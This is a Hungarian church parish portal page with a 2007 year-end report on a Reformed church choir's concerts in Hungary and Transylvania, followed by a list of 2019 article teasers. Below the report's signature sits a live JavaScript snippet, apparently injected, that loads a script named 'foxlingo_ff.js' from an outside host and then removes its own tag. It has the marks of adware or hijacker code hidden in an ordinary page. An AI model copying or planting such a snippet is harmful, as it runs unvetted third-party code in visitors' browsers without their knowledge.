Nyomtat Elküld Olvasási nézet

Énekkarunkról 2007-ben

Év vége felé közeledve gazdag tevékenységről számolhatunkk be az énekkarunk éves munkáját és szolgálatait tekintve. Korábban már hírt adtunk az év első részében történtekről, így azokról most csak röviden emlékezünk meg.
A már szokásos év eleji, ökumenikus héten történt fellépésünket követően a sárospataki gyülekezet lelkésze, ifjabb Virágh Sándor által szervezett jótékonysági hangversenyre voltunk hivatalosak, amelyet a templomuk régi orgonájának felújítása érdekében hirdettek meg Virágvasárnapra. A hangversenyen a két sárospataki énekkarral közösen vettünk részt, ahol külön-külön és együttesen is szerepeltünk Gárdonyi Zsolt és Gárdonyi Zoltán, Kodály Zoltán, valamint Birtalan József alkalomhoz illő műveivel.
Megjegyzendő itt, hogy a 2007-es esztendő Kodály élete szempontjából kettős évfordulónak számít, mert 125 éve született, és 40 évvel ezelőtt adta vissza lelkét a Teremtőnek. Életének 85 éve alatt számos művel gazdagította a magyar zenekultúrán belül a református ének- és zeneirodalmat is.
Nem sokkal ez után, Anyák Napján a Miskolc-Alsóvárosi templomban szolgált énekkarunk lelkészeinkkel együtt az ottani gyülekezet és annak vezetői előtt, amely egy kedves szeretetvendégséggel zárult.
Május közepén szintén egy meghívásnak tettünk eleget, amikor is Kolozsvárott vendégszerepeltünk két helyen és két alkalommal, amely városban egyébként korábban a Birtalan-házaspár végezte zenei tanulmányait. A rövid ott tartózkodásunk alatt kevés időnk maradt az ősi város nevezetességeinek megtekintésére, de kárpótolt bennünket a kissé fárasztó út és testi törődés ellenében itt is a házigazdák szeretetteljes fogadtatása. Szeptember közepén ismét erdélyi település volt a következő fellépésünk helyszíne, nevezetesen Kalotaszentkirály. Gyönyörű táj, míves népi kultúra és hagyományok, lelkes, kedves református lakosság. Ady Endre költői szavai szerint;- " pompás magyarok" élnek itt, a Kalota partján.
A nyár nagy részében Birtalan József őszre tervezett szerzői estjére készültünk, amely szeptember 30-án, elképzeléseink és terveink szerint ünnepélyes keretek között meg is valósult. Ez alkalom a nyolcvanadik születésnapjához közeledő ünnepelten kívül egyben a Zene Világnapja előtti tisztelgést is jelentette, ugyanakkor alkalmat adott arra, hogy a minket korábban szeretettel fogadott énekkarokat egy viszontszereplésre invitáljuk és vendégül láthassuk. Ez úton is köszönjük támogatóinknak, hogy e nagyszabású rendezvényünk ünnepélyes, és magas színvonalú keretek között megvalósulhatott. Ugyanakkor természetesen a résztvevők, és fellépők körének is hálával tartozunk a szép és felejthetetlen hangulatú estért.
Novemberben részesei voltunk az 5 éve alakult Mezőkeresztesi Kamarakórus jubileumi ünnepségének, amely az ottani református templomban zajlott meghívott énekkarok részvételével, és a hangverseny utáni szívélyes vendéglátással. Megjegyzendő; az énekkaraink közötti szoros kapcsolat annak is köszönhető, hogy a Birtalan-házaspár vezeti az ottani két énekkart is. E hónapban részesei voltunk még a Tiszai Vegyi Kombinát, mint ez évi fő szponzorunk törzsgárda ünnepségének, amelyen erre az alkalomra válogatott műveket adtunk elő.
December 16.-án délelőtt a szederkényi, míg délután a tiszaújvárosi református templomban adtunk szépszámú közönség előtt nagysikerü lelekemelő adventi és karácsonyi koncertet. December 22.-én Tiszaújváros főterén léptünk fel egy szép karácsonyi műsorral,míg Advent negyedik vasárnapján a tiszapalkonyai református gyülekezet szeretetteljes meghívásának tettünk eleget. Reményeink és a kapott pozitiv visszajelzések alapján bizhatunk abban,hogy fenti műsorainkal is sikerült hozzájárulnunk Krisztus urunk áldott születésnapjára való készülődés hangulatához.


2007-12-23

Fekete Béla / /Szutor István


(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();

Copyright © 2008 Parókia Portál, Minden jog fentartva.

Impresszum / Média Ajánlat / Kapcsolat / Hírlevél

Látogatók ma: 8, összesen: 62830

 • 2019. február 17., vasárnap

  Ahogy a szervezetünknek szüksége van vitaminokra és nyomelemekre, úgy a házastársi kapcsolatnak is vannak létfontosságú éltető elemei. Az egyik ezek k...
 • 2019. február 14., csütörtök

  Egymás megismerése nem ér véget a házassággal, akkor kezdődik csak igazán. Három házaspár osztotta meg velünk ezzel kapcsolatos tapasztalatait a házas...
 • 2019. február 13., szerda

  Mikor a kedves és én is öregszem. Vajon kizuhanunk az időből? Debreczeni Tibor naplója lyukas félórákból, amikor az íráshoz „éppen szivárgott a kedv”.
 • 2019. február 13., szerda

  „Boldog, aki felolvassa, és boldogok, akik hallgatják ezeket a prófétai igéket." (Jel 1,3)
 • 2019. február 12., kedd

  „Amelyik kapcsolat nem jut el addig a pontig, hogy akár válás is lehetne, az még nem is kezdődött el” – vallja Záborszky Zsófia pszichológus. A kisgye...
 • 2019. február 11., hétfő

  Tizennyolc évig imádkozott alkoholbeteg férje gyógyulásáért, majd egy nap válaszút elé állította: vagy a család, vagy az ital. Egy óra gondolkodás utá...
 • 2019. február 10., vasárnap

  Mitől tud egy házasság tartós lenni, a benne élők pedig nemcsak elviselni egymást, hanem boldogan élni? A házasság hete idei arcai, Gorove László ment...
 • 2019. február 09., szombat

  „Részestársai vagyunk a Krisztusnak, mind a közösen elszenvedett szenvedésekben, mind pedig a szenvedések fölötti győzelemben."
 • 2019. február 07., csütörtök

  Házasságban, családban élni jó, de egyben közös felelősség is. Nem csak a világ változik folyamatosan, de mi is, ezért fontos, hogy párkapcsolatunk ve...
 • 2019. február 06., szerda

  Az ökumenikus esküvő szép. Igazán szép. Ahogyan az ökumenikus házasság is. Megérdemli, hogy többet beszéljünk róla, hogy jobban odafigyeljünk rá.